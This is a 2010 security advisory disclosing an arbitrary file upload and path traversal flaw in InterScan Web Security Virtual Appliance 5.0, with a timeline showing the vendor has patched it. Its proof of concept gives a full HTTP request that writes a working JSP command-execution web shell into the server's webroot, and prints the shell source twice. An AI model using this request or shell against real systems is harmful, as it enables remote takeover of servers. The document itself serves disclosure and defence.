



Advisory Name: Arbitrary File Upload in InterScan Web Security Virtual Appliance 5.0.

Internal Cybsec Advisory Id: 2010-0605

Vulnerability Class: Arbitrary File Upload

Release Date: 22-06-2010

Affected Applications: Confirmed in InterScan Web Security Virtual Appliance 5.0. Other versions may also be affected.

Affected Platforms: Red Hat nash 5.1

Local / Remote: Remote

Severity: High – CVSS: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C)

Researcher: Ivan Huertas

Vendor Status: Patched

Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf

Vulnerability Description:

The vulnerability is caused due to an improper check in “com.trend.iwss.gui.servlet.XMLRPCcert” servlet, allowing the upload of files with arbitrary extensions. This can be exploited to e.g. execute arbitrary commands by uploading a specially crafted JSP script containing some kind of Web Shell. Also, using path traversal technique, an attacker can change the original destination path. For example you can use the other vulnerability “Local Privilege Escalation” to execute commands as root.

Proof of Concept:

- 1) Access to the CA import functionality, and try to upload a file with an arbitrary extension.
- 2) Using path traversal technique, an attacker can write into other directory, like tmp or inside the Webroot:

```
POST /servlet/com.trend.iwss.gui.servlet.XMLRPCcert?action=import HTTP/1.1
```

```
Host: xx.xx.xx.xx:1812
```

```
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8
```

```
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
```

Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://xx.xx.xx.xx:1812
Cookie: JSESSIONID=9072F5BC86BD450CFD8B88613FFD2F80
Content-Type: multipart/form-data; boundary=-----80377104394420410598722900
Content-Length: 2912

-----80377104394420410598722900

Content-Disposition: form-data; name="op"

save

-----80377104394420410598722900

Content-Disposition: form-data; name="defaultca"

yes

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Content-Disposition: form-data; name="importca_certificate";
filename="../../../../../../../../../../../../../../../../usr/iwss/AdminUI/tomcat/webapps/ROOT/cmd.jsp"

Content-Type: application/octet-stream

```
<% @ page import="java.util.*,java.io.*"%>
```

```
<% %>
```

```
<HTML><BODY>
```

```
<FORM METHOD="GET" NAME="myform" ACTION="">
```

```
<INPUT TYPE="text" NAME="cmd">
```

```
<INPUT TYPE="submit" VALUE="Send">
```

```
</FORM>
```

```
<pre>
```

```
<%
```

```
if (request.getParameter("cmd") != null) {
```

```
    out.println("Command: " + request.getParameter("cmd") + "<BR>");
```

```
    Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
```

```
    OutputStream os = p.getOutputStream();
```

```
    InputStream in = p.getInputStream();
```

```
    DataInputStream dis = new DataInputStream(in);
```

```
    String disr = dis.readLine();
```

```
    while ( disr != null ) {
```

```
        out.println(disr);
```

```
        disr = dis.readLine();
```

```
    }
```

```
}
```

```
%>
```

```
</pre>
```

```
</BODY></HTML>
```

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Content-Disposition: form-data; name="importca_key";
filename="../../../../../../../../../../../../../../../../usr/iwss/AdminUI/tomcat/webapps/ROOT/cmd.jsp"

```

<% @ page import="java.util.*,java.io.*"%>
<% %>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
    out.println("Command: " + request.getParameter("cmd") + "<BR>");
    Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while ( disr != null ) {
        out.println(disr);
        disr = dis.readLine();
    }
}
%>
</pre>
</BODY></HTML>

```

```

-----80377104394420410598722900
Content-Disposition: form-data; name="importca_passphrase"

```

test

```

-----80377104394420410598722900
Content-Disposition: form-data; name="importca_2passphrase"

```

test

```

-----80377104394420410598722900
Content-Disposition: form-data; name="beErrMsg"

```

imperr

```

-----80377104394420410598722900--

```

Impact:

Direct execution of arbitrary JSP code in the Web Server.

Solution:

Apply the patch that can be found in

http://downloadcenter.trendmicro.com/index.php?clk=tbl&clkval=249®s=NABU&lang_loc=1

Vendor Response:

2009-03-26 – Vulnerability was identified
2010-04-09 – Vendor contacted
2010-04-15 – Vendor response
2010-06-21 – Vendor released fixed version
2010-06-22 – Vulnerability published



Contact Information:

For more information regarding the vulnerability feel free to contact the researcher at **ihuertas <at> cybsec <dot> com**

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